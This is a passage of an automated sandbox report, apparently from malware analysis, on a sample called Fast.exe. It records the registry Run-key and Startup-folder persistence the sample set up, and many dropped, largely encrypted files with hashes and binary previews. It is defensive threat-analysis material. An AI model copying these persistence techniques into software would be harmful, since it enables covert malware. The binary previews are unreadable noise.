    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
    • Not all processes were analyzed, report is missing behavior information
    • Report size exceeded maximum capacity and may have missing behavior information.
    • Report size getting too big, too many NtCreateFile calls found.
    • Report size getting too big, too many NtOpenFile calls found.
    • Report size getting too big, too many NtQueryAttributesFile calls found.
    • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
    • Report size getting too big, too many NtReadFile calls found.
    • Report size getting too big, too many NtSetInformationFile calls found.
    • Report size getting too big, too many NtWriteFile calls found.
    • VT rate limit hit for: Fast.exe
    Time      Type             Description
    15:11:13  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Fast C:\Users\user\AppData\Local\Fast.exe
    15:11:23  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Fast C:\Users\user\AppData\Local\Fast.exe
    15:11:35  Autostart        Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Fast C:\Users\user\AppData\Local\Fast.exe
    15:11:45  Autostart        Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe
    16:11:29  API Interceptor  1x Sleep call for process: WMIC.exe modified
    16:11:35  API Interceptor  1815057x Sleep call for process: Fast.exe modified
    No context
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):386
    Entropy (8bit):7.236065806720983
    Encrypted:false
    SSDEEP:6:6q2clnjIgHPA9/unfaK6gziUpO4TdGljkl9eUHp2E8dTbw/8HBjeig34emu0+c:6qwgHPAczziUpxdGSlwSGbwaBm39Lc
    MD5:7446B8BE62D21CA5A23297901E2F163E
    SHA1:00269F66077C4F7A5CB17A46846257D3A81E76BB
    SHA-256:E50CA4F844E7923C8A45CC0523978857A2FB05F31C48511D41DE14CEF07A9732
    SHA-512:60164AB18BB6C7111F0CB7E9455BD1AD2426CE4183170632A5CAF41FBCA1C85DDBD63CC50D508DCBFBB8FB4FC4699D7EF3A1AD9DAECF5B3F63E7AA5C274EFC33
    Malicious:false
    Preview:..`.hW.!T ...;....O....S..J.\..~-....#.W....p.^.).9........Q.{..j....=....]..d7....6Z..v..LmPe.......iV.D.W.....)k..)s.q..oZ.Q.2)xi$=t..Ei\s ...x.Ad.L.)7.....+<.....k._......+...{..q...05.Q...........................|..4E.7.r..M....I(.....td.Lt........l.vY"V....#X/....S.WR:...8W2O.._...I-.`M."@.H.........5..[....c:8....t...\....<..&.......-...h....$........A_
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):386
    Entropy (8bit):7.222050497046844
    Encrypted:false
    SSDEEP:6:ABjkYWNAmhouIHr1Y6zRpxEiW7giQam6PUsVgLuJDil72E8dTbw/8HBjeig34emx:nYIlyuK1Tf9EQ3BseSJel7GbwaBm39Lc
    MD5:E66302364FD06B631F4B7B41ADAEC56A
    SHA1:3C7B0CD5A03A6CC1E86C313379833D309B088EEF
    SHA-256:63BD3EB7AA99A9F077ADE732DBEE533A74B0E9857158F344C28DB30BF53F2A5A
    SHA-512:1B2616A9D361C119173713F69C3EA503C0DF6FAC43ABD52B1CE74F71D65FD6909AE0F712A9E87853F228127B005A2280F074C6B63C459582CF8A0D822400BF6D
    Malicious:true
    Preview:`x.cW..V..B.c.'..3...n..M..U.:.bZ..*...'..n........,K.,Fg..ey.U..#.a....G.X.h..&...;..k..pg.]......OS.........4..Qb..d:..Q..5JZ.C..].......rxCf...q.G..}6..6C.l....\..9q.g.+.e&.:B."q.0...i......2...........................*...}......I(.....td.Lt........l.vY"V....#X/....S.WR:...8W2O.._...I-.`M."@.H.........5..[....c:8....t...\....<..&.......-...h....$........A_
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):386
    Entropy (8bit):7.202374888818583
    Encrypted:false
    SSDEEP:12:rdOT99jIeQZy3Tdd4RzJGalzGbwaBm39Lc:rsT99jD3THAGalbKYQ
    MD5:6BCF97572CE246BB4AB01AD4DB9EA734
    SHA1:39E76115C34E148ADD14E99BB97110EC7DD42A8F
    SHA-256:FD0A1BD08ADD6F0472F4D2F505243043E04B3DC0D08487424FC89184D8B9D060
    SHA-512:78808B9B8717AD415246CAF0E9EC63EFEC6DF9BEA10283C0343C1F7974FCFD215ECB1C80B5E9C55280F89D66494EE47C67E5566549BA9BDFE7E3A8B8AD152C09
    Malicious:false
    Preview:....N.*?.aT..g.J.`a3....Z.M.'^.........S4...V....3DX.F.y.Q. "..."..!e.2....eQQ.BF...~;...J...[......DdMF......J?...'.3.K..Z......M~3.+N..Y....z.e.v.....:D..\..tf.#.U.1..-.cj.{ 7..".SfqH..?.bd.1D...C\......................P..q....x...".....I(.....td.Lt........l.vY"V....#X/....S.WR:...8W2O.._...I-.`M."@.H.........5..[....c:8....t...\....<..&.......-...h....$........A_
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):115554
    Entropy (8bit):7.998132950408453
    Encrypted:true
    SSDEEP:3072:BsQQq4KwcKC/qLxdfChramW4OK5Y8Z6HmhYgDL6tV/Q:dQlcTo7fChTD/bFhXqtV4
    MD5:9E9454033929CFB01F25303E6AC1A6D3
    SHA1:25767C861934BDAFB3398177DDEE4B54A093E2C3
    SHA-256:E88E85EFC1B50C97A42F7AC5D6A0A783DB30AF38EAFDDB4FDAC6AAE465343128
    SHA-512:5F9CDC31A1DDCE85E3F27DB25944CF692AC53709F53BD167C96038F975FA886D0E60404B729FC9563CCD682261CE4369127144C417F79A4247D963E00095B951
    Malicious:true
    Preview:.....47.&Mt..!j.p.d.1...3..[=.%0 ..!......w9)b..AB..[.`...^T..s.O.H.<.(+.]5.J...f.3[7~.....o;I..%O.L...x.......N..9D...P.._!....u.x......H....Xs.V.qk@..g{Aj...P.......o...G.{.rC........g..........F.o.Oz....>2..Y..4.]$.O.....}....|.u,.p.....3..m..I...m...".....JB...Rg....:..7....`2....bv...;Er.[~...G..R.....6wH..B .*.Z.[./...y~wk.&i%<...A.....K=v,.p._$l...q.f.......N.GQ].*b..D...?.l-........d..0..U...}..p.7g<~.{....K..$.'n.]...9..V..e.{.....2......7$h.5.04.2)....{BL..../....es =....q`.'....;......:.D...a.0...i-.....E;..C.x~.&..p..^..2=b...w.....eF.._nMl.&...Y.._.....Yh.a...@g.p...QH.....`..G.2k...O .....b...\....}m.t.L..A<..!:M.....D......,....a..........1P...>.-....$.......V2.R:\0.'...N.}F.D.=T>.....5~.F.U .+.. ...`.&....c".h7....F...*.~..y.<....j.c0z..,..R..sy..W.I}yu.s.....s...J......X..wg.}.bU...iY.=.#E.ns3.}r..{Lv....Fu...\Y$.%.._.q..l.6..{.9...7.....EL......y.F..SSF..r.g0....:M-P......g}.....l.V3<.UY.I+.....>K..j;Q..]P...<
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):101634
    Entropy (8bit):7.998309132926901
    Encrypted:true
    SSDEEP:3072:GxKJ6NdlphO9kjIdrIQgsmzPBDwozWmMRHrZ4WjR86OQ:6KETOacdBrc5wQZWiwXR
    MD5:62D988CF922BBBCB9F94F1B94AC4B97F
    SHA1:FB359E6C0A22A9DAE592738AA3F7E6AE47388AF8
    SHA-256:B004581D97197AA03059596B3437C5D069854D3F4A7ED2FF7BDAD9122A99B9F3
    SHA-512:9E66A74FC81211E3E343BC45E839750D68FAFFBD185557A07144C1B5140E979FB92A6F499E2BB01C1D2FB7CA287DCF6CB3494916AEE801A4EFF5DF5DCE22FA14
    Malicious:true
    Preview:........l..%...........u....;.,.E.W....'..g.....f.C.)5....h$..\j...m%t..(...T.......h....I.....Zy.M.......p....i.....\U.r.{v^...........%G*..i..K+<h...4.a21D...0.R...<.....u.K@.)?......[..Q...}..?5......n.......^f.v.X....._.m.&...*Z......e....q....-....f..}.>N...O2$dA.v...We...'...MG......[65.2<. A..?.J'RZ`....&..f-........0.+%..y3c...<..v.p7.>.S...[.i6.{.juW.d.!.n...Bw..Z'.......)vc.~{.G.....z...$.....A....@2.T....r:_.sU...b0...):.DR...}...x...>......QQPxU....8.G.1.x,......7Y..!6.t.j..$V......A%.Uo.......;.)..4......8L.C....3..9.$..p.jG.c.>~t*n..>.4..oZ.6...}b..E...E...j..X.....^..<Q.I...P...@..cL....l.4.2.....".O........f..&.~...'!.&...dm.sKc..q.J.=...k...GcU......Mh.3..^_;......;..Z.."...T....3E)\w.......eO.o@Q.bI.R.$..D,...$.R.......mT.k....v/.J....... S.`ZuG_j.u......n..j.z...':...I.....;$P.5.P..F..V...G...X.H..uPa|'.2.I).,...sWi..f.....'./"-..V.[w......... ......R.k..|<&...D %...`~...H..`.....m.Y-.....%....i..,..?S.t]H{y..
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):66818
    Entropy (8bit):7.997054994728635
    Encrypted:true
    SSDEEP:1536:Tlb6ZQ3Ie7Wzyog+7Px781sznmMKFjH8KT4Q:TZfVCPxYsz1mH8u4Q
    MD5:50D256749EB1D1E044C4CE20D46B0B7E
    SHA1:C2DF7FB3A0813C64CE6F329683285F725FF65144
    SHA-256:870AB01ACB6B5871ECE30EFD9141B628839B9DA7586B898494EFD68AA7E0A051
    SHA-512:92746E17A68C31F451A2134A05E2CBB3988DC5CD4B71266912B32E5D28000DBE0E89AFA650A19974876134E9AB0208D02996ED580779FF06F9F8A28E9477DD8D
    Malicious:true
    Preview:s..g~.. ).....ME..y!.l.?."_{.9.FL.V.1..2..].3..`....A.FV......m.M.....p.O`.m.L..0....7<D.d.....J .H.>3.I..A.|B...y.&...c.....m...3....+S..r...Av!.y.......p+...$...s....+.../.g..R..%.....z`.n...M.]..u.M.a.`..`.....u...<.A...uo.fF#.....5.L....L..}.K...L[u....nHW.<"m.RSZ..p...K.....&....^..W.^...X2..>W.,UA*.....K.....o{.?...LC...UY.g_...U...tuf.i.-..MQ..H{..;hRoj.d.8._.#....+i ...EZ.].....#..j...p..W,.~%...}...]4*a.B5M.....\\.9.L3.u4..4...H ....b4H...g...h.c.~R...M...V..^V..Yz?]>.~..1t ,.Q>..m+.t.4.0...H.........fF^..X@...4.j......Q....#..<R..s......m..`kg......(...x.....!1.|y..o$...}!.6*.....>.z*.#U.E.o..m..3..b...;..5..s...u......u....&....%.R.^.wW.3Fjo...|..._j.<..:R...l....{p.2..]tWY1T..v.....;.......`J..@OWd.V..N.5.G.2.e...l{q......E.H........>.MR..>.B.g....`C...}..=. rPg....v.>ZEN/...'8.&w..o>.hc.x2K.R,RB.[...).Z.|.X....8...".^OXN:.....<...p.AE...t......PzB.:.lM......@VNVL..?O!.n..._.X.C.M;044.....6IGg...t!....~.4.,4....
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):2628354
    Entropy (8bit):5.696693375531154
    Encrypted:false
    SSDEEP:24576:o4i55tbhriFWaWBvYyozGUjmwd1qCaqKnCXvXWr7shjT:o4iZNrqZyyjmwmCvKCXvi7sxT
    MD5:425004891A6B536BB2E2BC81A6FE5698
    SHA1:6ACE476A6CF81134F625F8E0B9C3EBA80ADE4334
    SHA-256:5738164900DDBFB7781B47450CF207AC0DCA7495867409AC80FA72BB093382AB
    SHA-512:87FC9F33615B11BC383E6AA99869D9D4144BCE97D6DB7413B322BC3DF9B23491D83F3DD0B6CB50059D30C5DA38B8B4FBEFABD8985C74DF925DD4C66EC8CE406E
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):557298
    Entropy (8bit):7.999738926702925
    Encrypted:true
    SSDEEP:6144:w7upzp0VNQ67u7MnnvtsF4GNB6y6uWszCLBYLiQ49xfWZQFP4U3j4k1+oiK/M24l:w7upL78vuVNB6uhGlcYuqFAqi+ujhqXw
    MD5:0668AD0027FD4301041F218469B984EF
    SHA1:BB65519B9B4EA1172FD001E86F602201B2093FA4
    SHA-256:5654FB5F1B1643E87F83E763A8F9B950CBCD23A4AF428E7E10E7833EAC42BFB5
    SHA-512:4D3F72C9C7D736EAF1B95B88C6B65F082214D436F08D8684BDD55B015B3B9586D671309172FCB448D92D15E530124AB899EBA66C0FF5FDEB45313979E270FEEB
    Malicious:true
    Preview:..2...yGFt.[...z.....Y..`......+2#......~..qo.x....Y{#N$......\.......!..Z.3...Xw|.]-Yz...x.F5@...su_j....SE..5.....VwiB..,.......}.|..u#.............p....D`_".U.kT..o.KX.].e....0..Z..x.....IC............d.U6...&_:q.....l...&.y]w..%H%!./a.....$....G.6]".k..=8N.....6.2...*N.._..h$7>....bws0..u....I..a...k..5.o......Sm...L.1..RNGy.3j.O.7.,B<.5.....(....;.br....p...{.....;b$y,6.\(....] ......|.&3...0...^$X.>...)OS...?......6.J.ilA..]E...$..Y{6.ZlC..7...M..9{..&...5k...>.g'WUwnJ...\..........._..rosz..?!.&.U=0C.....e..t...W.D...jaYQ?.)...p8.)..p...c.#.~.../..;.YT..|...w...hG..3^.UsM...l.M.......$Pr....+.@...u....(Q.$.z.......$v....~.07.HMtN..&....]V......r&=.5.....rl*.........w..G_.%.H.12.H..eO.....5.. D.[...9..B..5.-.Y..{......cf.Q++b0..N..}.W."*.|.JKj O.....]".I.....BM.K;.....e.R..UL^ JT..o..o..fY..........."..6#7...U@m....m"("p_.?.E...{...(.U...*.....>h.9.z.V.O.49....*..k.....SS...p..B..X.=..9..t...2@..%...;..&6m.&.}..#]..4.'y.+'......
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):214770
    Entropy (8bit):7.999179399201365
    Encrypted:true
    SSDEEP:3072:o4KhPAFPFpq4wThtLLUmQhDb239ZwhWUG/4GA8ZkFq22JjIfrkU0gemq72J4uwk2:BKJANq1LmMvDXBCD2J0IU01l7yKf
    MD5:50E99F917243C768A8D61CF118B4A5D6
    SHA1:7B724C48BB3677B6C3C0998F628992532ECB741A
    SHA-256:5886F24570234CC2C18FDD9B798F3C8AB7DFB88E72918CB395F0D787F18CD63E
    SHA-512:1CB9A2DA843F837F999C2130DADA3E513C913B6786CECA2E208B3256FE30B3DE952B16E305341F4ACD6781109D62C4A7B24CD9975630DDDDB51BAAAAD1CCC8F3
    Malicious:true
    Preview:..6..9...c....\f..(v..x..._k.....`.*........q....zDW2.q.3w..cc...M[...O.8.}.6..L.U.):..y.C......I..i8_E.~U...........e.==.n.......3N...@..^N.f.,....z..o..a.G..o.I.Ib"..0.V..C..........a5rX.....G.E...a...4.V.[..UB.`...(47.1..:.W6.......%.,.p.>..5.^..?.."6....s.....m....m....]...1...k%m1...rd%.>.uX....^2.d.....-3b..M0-.^..a.t.TZ............*.}.d$1....v.Z....i6....VV..M.A.p3..G..W...8 )...qP.....IP..5...g...7...e..0...|.F?.Q....TX...........1<."....~.'.-...'.=..3.0..e....K.H.Q....:....U...>4.@. {..g]..fP'..syM..~{.glx....UU..dM..I.j....U.."..k]5J......)_..&\.j.....G.V.v..7p...YZW...}...7`.[.i.|.D1.....I.dV-1_..u.=..i..p)G]Hhb.N...4...T.|..{.Dy].!.Z.........%b.............1.M..zW.$m..*..t.>..../Z:..ED..E...)6..=...8u5...G3.......9+<..j....0!....!..><M=.ZT.:......I>.+V...b.s..L....p.....%.{.....{g0S.cD.....C.%...O..~p.*.x...h..n6V.`._.....6X..!.|W.?7....jX.~.Af.!.7.....U.Y.?(?...}..?C\ ..._.`...G.gHl..qt.9..:!.#...7.}M..~..2...b..7kZ.[ox..c
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):193282
    Entropy (8bit):7.999137770282298
    Encrypted:true
    SSDEEP:3072:9OGk68zBkS9D8YzKNM4YkGo/wNGD+TN32myJ13IbjAPmpVqqujA++FApY4oUDvhK:9VS+G4BgNGyTNjAIbM0zD++AN9Dvf4Cg
    MD5:A9B51C4671DBEFFEDD4143E2F829C9EA
    SHA1:4F400064C7CCBC70C6204FC582372447C65A9558
    SHA-256:A24DB8BDDCF33626D5D6F253579DB49745B2E0B2364D33C89C455DCA66299A08
    SHA-512:F3947811FB38BC52A5C1D2F84D9DF4BAB14DCEDAD564820B678A2E430A500EC922741FDE938EFB7A82C43128294D8CFEBC29856BFED9468A73F42DDA54F8B9E6
    Malicious:true
    Preview:G....^..>s...2 @..V..@.z*I._..)...?)...I.S.....C....\.T.M.F....e!U=.j.Mo.".&V..1..JR...r.{..w..}.$..[.d/..=j..nW..:......k)k..F....S.;b.QG.S.UCB.T.jZ...'..8.....lg...B..%._...hbM?o.>.m...).%b...'..KB{...P..g-H.....6ef.\.o..a..X.....K....4#..R.M...XA.......\Z....e..2..&....K.WB......I......}R.J/DY-!...V..J9....l....H.&.O..X+...n.....1~...m.J..;7.@...._...h..^.&h.<.....6..z;..Wd".4...%tj_C.....K.7(2;3G..T2$......H.ta.@t.Qp:.../.>....v.=.2\D..g...6.F.?'.m..cl.......u^..S...CF...7.&.P.5.,..s......]..).L....eI...0....n.....Q6..d.8+t..Z..F.u...U@.t.{..x.f...A.Y..^.j)R.yk..p...u@....S^.}U.w........=.=...ayC...2.d....a...DN.T...G....\..F..M.$E/Gdi...GC....D..."..K.f....j..H2......1.....i........H.~._kf.t.1.II...~....q...2.8.CV..`A....z.t .'x..nr.....j.)....w.y......`.Yi&........c...7.R.O2....)....X)LK?.H..}N......9..J..k..0"Y..,|..^.A...aP/....J...-$.....+.+.r..HW...5*..G....S,..2.6.w..#|>d"x../CZ..W&......(kw...2.0..W.5h..C..*o..^.b..'^..
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):953090
    Entropy (8bit):7.9998265988627
    Encrypted:true
    SSDEEP:24576:jvL5MF7BUeKQQ8AsaKtBS7/U6iRIwf/B1M1wD6z:jvL2/U4nAhKBiiRbTM1wmz
    MD5:63F4DEE457F1050AC6975C9ECB15B786
    SHA1:2AE7BB1F3C17593187D4FE514C1E67170138CA7D
    SHA-256:DA3B1BD2B617E69FDC331D7A6F3E9AA05D051DC1FC521DD3F21C935126FC9E93
    SHA-512:8243E0C6D2B4754B2D756A557E912D4D31C0B11E4658CC7B2BA7C3074CD19243B4667AAAA14D2146EB6EF49FBF18C932B209B6C8A7D35CF6ECD1C1EB507E1B96
    Malicious:true
    Preview:.<j^...~.Z..}F.$..=I...a.c b..{.}.I..;p8.....N......v.S.....w.q..1....J...C. Y_..fe.)..3(.`(..u:..-.b......... .....e.%1........'.1..r.~..A{.I.{e..0.(....F../"..E.A...'..m..L.Y.Ay....v...0.D.>.t#V...w$;..KE...a.d..j..8.....u&.._. .*...{.BD.7hp.+(j.s.'......./...........?..h.5..>b..%......2.....G`8M..S.B+z..q\..ER..`.N.....(a.....T..1......S*.?N.<...Ja[...D..ll.N..v`G).....4....E.=...=Z....{...b.St.........|R...uH...6....C..g....A......P*....5.......A(Q.[..dP..f[O.S..|L....WM.....kb.M.......o..D..C.GN.7/@..M..) .C..[...6D.(...{..k..t.U.k.;..U....*U..e}...m./qj.A.~......[..M. .t.?\...,.o.....LR...mn...)..(?%6%oKb.~.5.&..d.Q.q.R...zv.... ...+k.....ZP.;. ..MM.{u._]1#Z../.BV...~....A#....M.......dDx.....Gru.X(.....,...v.f....8M,n.i...K_...W.M...oF....L.=..oZ.`4S<.$..XO.j.Q....U.....fN).F.v...p03rnf....7$U0Cv`<..y..ZY.v.B.|..j....6.w5...&.g.D.x...+.....FF.K9..\.qT(......!'.^.@.lWc..C....C...G!..j%.......UK........&.P........_.e|.5H..l......nO..Y.. ..
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):700658
    Entropy (8bit):7.999730752289234
    Encrypted:true
    SSDEEP:12288:fjNF2k/cgTkZv3kePeNiAXU3o1BpH9lCXww19c2WpHRPQFmGhoWRiyeN4:fT2k2ZvVPe8AXU2NGD6RRP+xhoOxea
    MD5:A27399EF090703AA38CE491858463A5B
    SHA1:D502BDA5EBF0601DAA812D8F64A8A3874EAFED2D
    SHA-256:DD1613E156EDB8461C0B97DB4CAFE750F415E648D6651FC06B108D98AF88A544
    SHA-512:BED1099058EED306F8563D6C963C034DF27F45B83C82EFA6AD76013B6ABC163F4C7590970DF30BBB1DDF7493F17AB5E3FDAB7DBCAA6B3CEC4D53B9DE966A5C2A
    Malicious:true
    Preview:}.(..;.o..dn..i.......Jx..#..o.11.v@w.5....M...'obE.L...!......a..-w.r...z.4.QjS....o.......q..Na..!....O.G.X..L.N..K..../...~zo'.b..YU<*../f@..c..."GfI.r.D.~..P........&$...-.>..D...$..0...I.c.?.u....dU..He.YB'.v.7.d.L..k.':Q.m.RU..F-:.<G...pm=....{.7.+.........$.+.4y....$C.TU`9o.T\.i..n|(..L.S.....YrI./M%.g..r..s..Tu..R.P.O..=.N.....e..%Z#0..!Cr.N>.C\.'....A.QK|v-..jj.Q....Lj..[.pT.j........A..... ..\G.{!.qY.M7N....s..J.)... X......;...sf...ze.........v#..L..)<d.......<z....l..V|J.w.l..ae@....tU...^.`........zG.e.'VH<.H.@..n..m.C.Q.C4>w......k.D.]....|.{%..M....=!.......m..s.......7+.S..(Q...y.uc\_.v.[a........4~..?.W.Z......V..-}Ebf...9..\A.1.@. t=....F..a..lR..d.....$..n.....;.d..d.+..{.1..c.T.D..Gu...~.fs.gMZ.K{....8.3...v.......7$...A&...r.I3..dZ.I.%/.....+1*.._..4...:..D.t.....C..`......*.NRIULeAC/e....,...ZO.4.^..-...h.....5.cD,..!.&g..|1C..._*s.Bi...up.9.".P.....d.9_D.&dG._).<....r.M.M..h.,..P.G4.,...?Z...7..B.YiS.w..q..O..".?
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):58562
    Entropy (8bit):7.996442765449261
    Encrypted:true
    SSDEEP:1536:/kvuPkvOoYPHAdtifk65f3poAbmhquKxZcPwIQ:vWgcq3WdhqjxiPrQ
    MD5:C5EBEC783F50707D192B2C7FE2AB9E2A
    SHA1:91EC1948133F4FB969651F182BCF65C776A06305
    SHA-256:220C95A89854A24A40BD9E569BECF42391DD9EB85E69835C03207FE2F17507C8
    SHA-512:F7F03E0156AD0C0D8DD98EF7C6385EF85CDDBDF878AF1D525EAD92DA18411A584296519394E083D06D716F7484618AB861CF1451D53EA9B1E03664D036789F0F
    Malicious:true
    Preview:.....C.....\.T.s..}+.[.^...S.^...l...i.F...A....xVy..o.Y.Tul...CP..]n)`.\...f..,O&xE..[f.....XQ..C..8..w..#...g.m..k.<......Sx.......s...!.".i.......j.*>h.*...rQ.vkPIN.....3.....n[.N..[.i...x..].U...C.s..bd........{..t.c$..-C..x.@..vhv...o..Y;.]..c.uRu...'....'RRFQ.....Sli.....w.. ./.v.(.....V|K.La.......o.T......9c.@wT......r....B..."......T..7Q......e."F.^u\..zI..+..&..2.9.....h-."...I....D....[*.".s..:.....V=M.9O.m.2.T.x...G.*z...u...\.#.....D..........w.1...V2...!0......X#. .9].9l..L..:.....F..[.B.h.l..0.....^...Y..]T..r..k.A;.W.....r.... ........i0....33...!98!..<".?H`..L..}.A.?......K\G...$....]B.pf..............~..E. &.M...).....T.....%..5.~.*.]..U.'3.....,2g...e..f."....i....N2...X...3.@.:.z..n3......<...).ZA)..H....3.....2.q].J.+hT...(.Yd.{k...t.38.0..>.y.W..V.T./.m.S....{.>.3.Y<..d@2r~...:P..2l.^.hQ.A...p.....-gc.C.....\...oP.`.....du.....g.?MO.;......I9-...W......j.g.5*9......U.*.......X..D..`.......K...c..Q;|...p...
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):5266
    Entropy (8bit):7.955959727548579
    Encrypted:false
    SSDEEP:96:07c+bPE1z3iTuttRLs9SLdoKuS/mWWYP0CQalszInBfdqg1QY61uyGjT/56dheBu:Ic+b8tRTLOgmWWY88vd9V61uUuJA
    MD5:6E5B49F26B6A3B3A5CC871403528BD4F
    SHA1:86FA5FCBFA0C14E601B6ADA385AAFDB5E3DB57E5
    SHA-256:3CC785E137ECEC9167BBA204E4AD36794E428DADAC0D144D530671AECFD29BEF
    SHA-512:A28EB8DD2F49EC76459FC5B00EEBB090C0737C50B46AB32F9DE42D634DECF6F1027A7677DB4936391DFBD4A01FC74138E307D9CAB57B29F803B8DDF942A1631A
    Malicious:false
    Preview:.n..wT wM.....)...G...&'y.....-L)....8...3....p....8|....g.]...>.....<.4;d.FG.K..6......0s.!;J.+...._Ri..2....^..........%.r`U...x!4..W...T.M.E...._N.8.~3..8...'V...S...x.3........j...Jl....a.7c..C...G.E.....I.....on....!.}7..*~...FK..../.....{..H...S........i..`...H.F2....m.....7.b.9O...<......]>@.n....{M................BF.....Q.. ..\xH..P..K........d..b2../.&&SU{.9......&.%..^Q.....3.....>..?./..J.x.V...4 ....L..S.=....8.0Z6.HB.a.A.......e...w+p`...*.}......7....Zw{.....8..G.r....X...c...o.jn[.>.e..}U......_V^.l..|.A..T.....r~.9......;...i.<.......N.~.q7Y.Q.+y..SD1pd..).x..fA....r-..7..:..X..)T..L)..|...U.s..T.w.|. .....3.{.....l..........O..@2...sA.lqaR4..W.j..+..T1/.&F....R/.m?......o../`..4T|.e.mA.s$.%.*.".-..kF..A.FY.3.-."..:$.@beBTJ.^j..'L.>..nh...c.r]6.7f[b..(W.5.L..w.....I.I.]..j.H...Q.(..`o..b.(.9....~.G.g...........X(.-.w`3W...........hgB..dk#...j....s+s}...X. ..xq...E{.?.v...BC.i..~.B..#....cw..O#....*.b...|...}.\O.xp
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):8018
    Entropy (8bit):7.975488267947544
    Encrypted:false
    SSDEEP:192:fZ/odUvhRMtQb4PiayZHsTdozZBRSSHcvn7N9oprbowWqGlj2y/A:fZosMo4PiaSHz4jv/opH5Oj2y/A
    MD5:9211F64D3441A0B30CB604921B44FD5C
    SHA1:34CDFC697EA06F51877256E28BF885B88F372344
    SHA-256:26B47B78055F0209B000CB2D1A799C33B0E63E2CF61982D3FB64AB90DAA3E529
    SHA-512:EA56E8863F04707433C275C0D73502A4304E461DFEF076150511E5E8F97BDCCFB04B3D5F770E435A7A1826DF7BCD3B76B1E53259EF1E85C96B4DB66F1259B027
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):13026
    Entropy (8bit):7.986342071445548
    Encrypted:false
    SSDEEP:384:MON9jMuJfKpPO4W40IdvDLX09F06NNtPrW870A:Z7jNJfKpTP08YNtDoA
    MD5:AD2FDC0BA5E90A11322047F9F383B123
    SHA1:6423E4A4FBFDA8164623FA69D3937536BEA8EDA6
    SHA-256:26E49C430C9A32A1C80D84F0C1F41AF69E2FB978AEE1424B6C4275BD7F039759
    SHA-512:25EC6059879707FDC9737724599327C285482D5EBE352EB678316CC0B722C4451844F0EE492B2BC05398D651AD814BB355177DE09EB4C885E8D121C1009E0C8E
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):5602
    Entropy (8bit):7.969808074449861
    Encrypted:false
    SSDEEP:96:HfcsJdUXvT63YqtWzpPNGd+hn8xlZVb5NdqeyD+c2ShouNuNLpkJ+6P+dVVNTWsJ:/cJr633kNkVb5Ndqes+80N6J+u+djNao
    MD5:7FC4959333300DF6A77D43876D0E37A3
    SHA1:2649A026084BADABB0CAE3D743FDCB812B16397D
    SHA-256:FA7736F7309466B78EFCE0B3D9FDAEE1A36285BEB6745864CD97D66209C8FDB0
    SHA-512:D4ADDCA918273B5046661BE9D59043D010624BA599FE37DD38D8EB080E0951851CDBE7A5211E6EE6C69254C07CBEA90988646791FE17ACE2A82A1DA90F2BF30A
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):9858
    Entropy (8bit):7.981168958785209
    Encrypted:false
    SSDEEP:192:pflbvH34U3OyxQTlwu59AOt0nEnDT3ccphHLYaIqGMZuh8gVVV8JtzCA:pNbvXK5wu5tCEnDbccphHLYaIqGMZuqh
    MD5:0D4E4CD4EEADDDF885B1F80AC872F4D3
    SHA1:352AA8544BAA2E90B1B15FD4B52E681BA98D58BB
    SHA-256:741990887DA9CAB2E790788C6542BC4C2DBD776EBDD317CE4565E62C48CB5902
    SHA-512:6A0ADA725A2D0B3024281186505FDC47A3C1490AD15F115DE31B7B73227F7EFE9E1749199F500CB0383A1BCD40235C85B33C2CACD736B145F675365262EBDC71
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):11474
    Entropy (8bit):7.978675475463158
    Encrypted:false
    SSDEEP:192:gcD9CK+xOIwOIcPgOR7xwiS9lswmxxy4kyQ8xWXHL1PAjjKPfsd0BhA:KBxOIB3PguxwvihxxyNB8xYr/a0hA
    MD5:DACB58E310D06759540672E81E24DCC7
    SHA1:C1E8907FE9C69347528FDCA7835139CBC0798DA7
    SHA-256:212525D8E3B4CA5F4C7843CA8FA079323B0129606DD53261CFADA8B479AB6723
    SHA-512:33EED380D92D5591CFE0A37C105BA8468A5825D0B48422AFE05E0E7EEC971797DCC80487824345C8E7BF2095E6C55C95B5BE235ED528864D4F71C1737CC59DFE
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:COM executable for DOS
    Category:dropped
    Size (bytes):12098
    Entropy (8bit):7.982855038904786
    Encrypted:false
